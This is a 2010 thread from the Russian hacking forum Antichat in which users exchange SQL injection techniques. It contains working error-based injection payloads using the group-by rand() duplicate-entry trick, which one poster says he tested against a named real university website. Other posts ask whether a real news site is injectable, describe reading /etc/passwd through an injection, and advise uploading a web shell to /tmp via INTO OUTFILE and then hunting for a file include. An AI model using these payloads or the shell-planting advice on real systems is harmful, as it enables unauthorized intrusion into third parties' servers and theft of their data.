Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
14.06.2010, 23:46
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от BlackFan
Эксперементирую с group by rand()...
На 5 версии
Код:
select count(0) from table group by concat(version(),x)
x = floor(rand(0)*2) или rand(0)|0 или rand(0)&1 или rand()^0
выдает Duplicate entry
x = rand(0)
выполняется без ошибок.
Решил проверить на 4 версии. (Проверял на сайте http://decanat5.ssau.ru/search_student в sql-inj)
И вот тут результаты просто поставили в ступор
Код:
' union select 1,count(*),3 from student group by concat(version(),rand(0))/*
Выдает Duplicate entry, а
Код:
' union select 1,count(*),3 from student group by concat((select 1),rand(0))/*
нет. В то время как
Код:
' union select 1,count(*),3 from student group by concat(version(),(select 1),rand(0))/*
выдает Duplicate entry, а
Код:
' union select 1,count(*),3 from student group by concat(version(),(select studentid from student limit 1),rand(0))/*
нет.
Так вот вопрос)
1) Почему на 4 версии иногда прокатывает с rand(0), а на 5, сколько не пытался, так и не получилось
2) Почему с floor(rand(0)*2) прокатывает всегда, а с теми же rand(0)|0 работает только на 5 версии
3) Почему вот такой запрос не выдает ошибку, не смотря на то что там floor(rand(0)*2)
Код:
' and (1) = (select count(*) from student group by floor(rand(0)*2))/*
1) На 5, работает практически так же, как и на 4, попадется пример, скину в пм.
2) Самый вероятный вариант, это то, что в 4 версии, символ "|" интерпретируется иначе.
3) По поводу почему у тебя выдает ошибку в случаях, когда её быть не должно. Я полагаю, в union select у тебя идет объединение колонки studentid, которая уже используется в запросе, в результате чего union со своим свойством делейт-дубликат конфликтует и возвращает false в массив, По сути потому что у тебя идёт повторная выборка. Как-то так 
Последний раз редактировалось v1d0qz; 14.06.2010 в 23:56..
|
|
|
15.06.2010, 11:17
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861
Репутация:
5
|
|
Подскажите. есть ли тут скуля ?
http://www.territory.ru/info/news/index.php?show=news&id=-2984
Последний раз редактировалось EoGeneo; 15.06.2010 в 11:26..
|
|
|
|
15.06.2010, 12:16
|
|
Участник форума
Регистрация: 06.02.2006
Сообщений: 177
Провел на форуме:
1576821
Репутация:
88
|
|
Подскажите. есть ли тут скуля ?
в параметрах show=news&id=-2984 точно нет.
|
|
|
|
15.06.2010, 13:41
|
|
Новичок
Регистрация: 12.05.2010
Сообщений: 10
Провел на форуме:
37183
Репутация:
0
|
|
Сообщение от exT1ma4ka
подскажите пожалуйста как залить шелл.
ситуация такая: mysql стоит на одной машинке, сайт на другой (хостинг) - есть sql-inj дырка. INTO OUTFILE применить не получится исходя из выше-сказанного (mysql на отдельной машине).
по крайней мере пытался, но пишет:
Error 1: Can't create/write to file '/var/www/пам/data/www/парам/uploads/shell.php' (Errcode: 2)
актуально )
|
|
|
|
15.06.2010, 13:43
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от exT1ma4ka
актуально )
залей шелл в папку /tmp , и ищи инклуд на сайте
|
|
|
|
15.06.2010, 13:46
|
|
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126
Репутация:
55
|
|
Есть сайт с именем третьего уровня sub.domain.com
Этот сайт на инъекцию реагирует ошибкой "E:\inetpub\wwwroot\___\___\index.php" и север показывает Microsoft-IIS/7.5
Но ОС, показываемая инъекцией - REDHAT-LINUX-GNU, я могу читать/etc/passwd и пр.
У головняка второго уровня (domain.com) ИП отличается от первого. Сервер Apache/2.2.3 (Red Hat). Его файлы я, видимо, и читаю.
И что-то я нихрена не пойму как это устроено. Может кто объяснить?
|
|
|
|
15.06.2010, 13:49
|
|
Новичок
Регистрация: 12.05.2010
Сообщений: 10
Провел на форуме:
37183
Репутация:
0
|
|
в /tmp/ тоже не льёт. в любые сайтовые пути не льёт. зато, например, C:\SQL - спокойно заливает. или любой другой виндовский путь, а всё потому что Mysql на винде, а сайт на линуксе. что делать в таком случае ?
|
|
|
|
15.06.2010, 13:50
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861
Репутация:
5
|
|
Сообщение от qq6ka
Есть сайт с именем третьего уровня sub.domain.com
Этот сайт на инъекцию реагирует ошибкой "E:\inetpub\wwwroot\___\___\index.php" и север показывает Microsoft-IIS/7.5
Но ОС, показываемая инъекцией - REDHAT-LINUX-GNU, я могу читать/etc/passwd и пр.
У головняка второго уровня (domain.com) ИП отличается от первого. Сервер Apache/2.2.3 (Red Hat). Его файлы я, видимо, и читаю.
И что-то я нихрена не пойму как это устроено. Может кто объяснить?
Видимо на хосте поддоменость работает в таком виде.
sub.domain.com => domain.com/sub
|
|
|
|
15.06.2010, 13:51
|
|
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126
Репутация:
55
|
|
Сообщение от EoGeneo
Видимо на хосте поддоменость работает в таком виде.
sub.domain.com => domain.com/sub
а "E:\inetpub\wwwroot\___\___\index.php" и север показывает Microsoft-IIS/7.5 как объяснить в таком случае? И разные ИП?
|
|
|
|
15.06.2010, 14:14
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
qq6ka
Mysql_connect($HostOnOtherMachine, $Username, $Password)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
